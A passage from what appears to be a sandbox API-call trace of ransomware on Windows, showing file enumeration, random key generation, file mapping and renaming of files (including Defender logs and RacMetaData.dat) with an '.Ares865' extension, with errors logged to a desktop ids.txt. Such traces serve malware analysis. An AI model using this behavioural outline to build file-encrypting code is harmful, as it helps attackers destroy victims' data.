"c:\\programdata\\microsoft\\windows defender\\support\\mplog-09132019-235903.log"), lpNewFileName="C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log.Ares865" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-09132019-235903.log.ares865"), dwFlags=0x1) returned 1 [0114.444] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log.Ares865" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-09132019-235903.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0114.444] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=800) returned 1 [0114.444] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0114.445] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0114.445] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0114.445] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x620, lpName=0x0) returned 0x170 [0114.445] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x620) returned 0x190000 [0114.445] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0114.446] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0114.446] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0114.478] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 62 [0114.478] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0114.481] GetLastError () returned 0x20 [0114.482] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 84 [0114.483] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 84 [0114.483] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0114.485] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9a2a [0114.487] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x54, lpOverlapped=0x0) returned 1 [0114.489] CloseHandle (hObject=0x118) returned 1 [0114.494] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0114.495] CloseHandle (hObject=0x0) returned 0 [0114.496] CloseHandle (hObject=0x0) returned 0 [0114.499] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0114.502] FindClose (in: hFindFile=0x2cd0a8 | out: hFindFile=0x2cd0a8) returned 1 [0114.503] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7790 [0114.538] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 79 [0114.538] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\ProgramData\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\programdata\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0114.538] GetLastError () returned 0x20 [0114.538] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 101 [0114.538] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 101 [0114.538] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0114.539] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9a7e [0114.539] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x65, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x65, lpOverlapped=0x0) returned 1 [0114.540] CloseHandle (hObject=0x118) returned 1 [0114.540] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0114.540] CloseHandle (hObject=0x0) returned 0 [0114.540] CloseHandle (hObject=0x0) returned 0 [0114.540] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0114.540] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0114.540] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79f0 [0114.561] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 96 [0114.562] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\programdata\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0114.562] GetLastError () returned 0x20 [0114.562] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 118 [0114.562] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 118 [0114.562] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0114.563] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9ae3 [0114.563] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x76, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x76, lpOverlapped=0x0) returned 1 [0114.563] CloseHandle (hObject=0x118) returned 1 [0114.563] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0114.564] CloseHandle (hObject=0x0) returned 0 [0114.564] CloseHandle (hObject=0x0) returned 0 [0114.564] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0114.564] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0114.564] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a10 [0114.586] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 113 [0114.587] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0114.587] GetLastError () returned 0x20 [0114.587] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 135 [0114.587] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 135 [0114.587] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0114.588] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9b59 [0114.588] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x87, lpOverlapped=0x0) returned 1 [0114.589] CloseHandle (hObject=0x118) returned 1 [0114.589] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0114.589] CloseHandle (hObject=0x0) returned 0 [0114.589] CloseHandle (hObject=0x0) returned 0 [0114.589] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0114.589] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0114.589] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a30 [0114.616] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 130 [0114.616] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0114.616] GetLastError () returned 0x20 [0114.616] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 152 [0114.616] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 152 [0114.616] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0114.617] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9be0 [0114.617] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x98, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x98, lpOverlapped=0x0) returned 1 [0114.618] CloseHandle (hObject=0x118) returned 1 [0114.618] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0114.618] CloseHandle (hObject=0x0) returned 0 [0114.618] CloseHandle (hObject=0x0) returned 0 [0114.618] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0114.618] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0114.619] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a50 [0114.648] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 147 [0114.648] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0114.648] GetLastError () returned 0x20 [0114.648] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 169 [0114.648] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 169 [0114.648] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0114.649] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9c78 [0114.649] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xa9, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xa9, lpOverlapped=0x0) returned 1 [0114.650] CloseHandle (hObject=0x118) returned 1 [0114.650] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0114.650] CloseHandle (hObject=0x0) returned 0 [0114.650] CloseHandle (hObject=0x0) returned 0 [0114.650] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0114.651] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0114.651] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a70 [0114.684] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 164 [0114.684] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0114.685] GetLastError () returned 0x20 [0114.685] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 186 [0114.685] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 186 [0114.685] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0114.686] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9d21 [0114.686] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xba, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xba, lpOverlapped=0x0) returned 1 [0114.687] CloseHandle (hObject=0x118) returned 1 [0114.687] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0114.687] CloseHandle (hObject=0x0) returned 0 [0114.687] CloseHandle (hObject=0x0) returned 0 [0114.687] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0114.687] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0114.687] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a90 [0114.720] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 181 [0114.720] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0114.720] GetLastError () returned 0x20 [0114.720] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 203 [0114.720] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 203 [0114.720] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0114.721] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9ddb [0114.721] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xcb, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xcb, lpOverlapped=0x0) returned 1 [0114.722] CloseHandle (hObject=0x118) returned 1 [0114.722] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0114.722] CloseHandle (hObject=0x0) returned 0 [0114.722] CloseHandle (hObject=0x0) returned 0 [0114.722] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0114.722] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0114.722] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cd0 [0114.750] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 198 [0114.750] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0114.751] GetLastError () returned 0x20 [0114.751] wsprintfA (in: param_1=0x2ccd7d8, 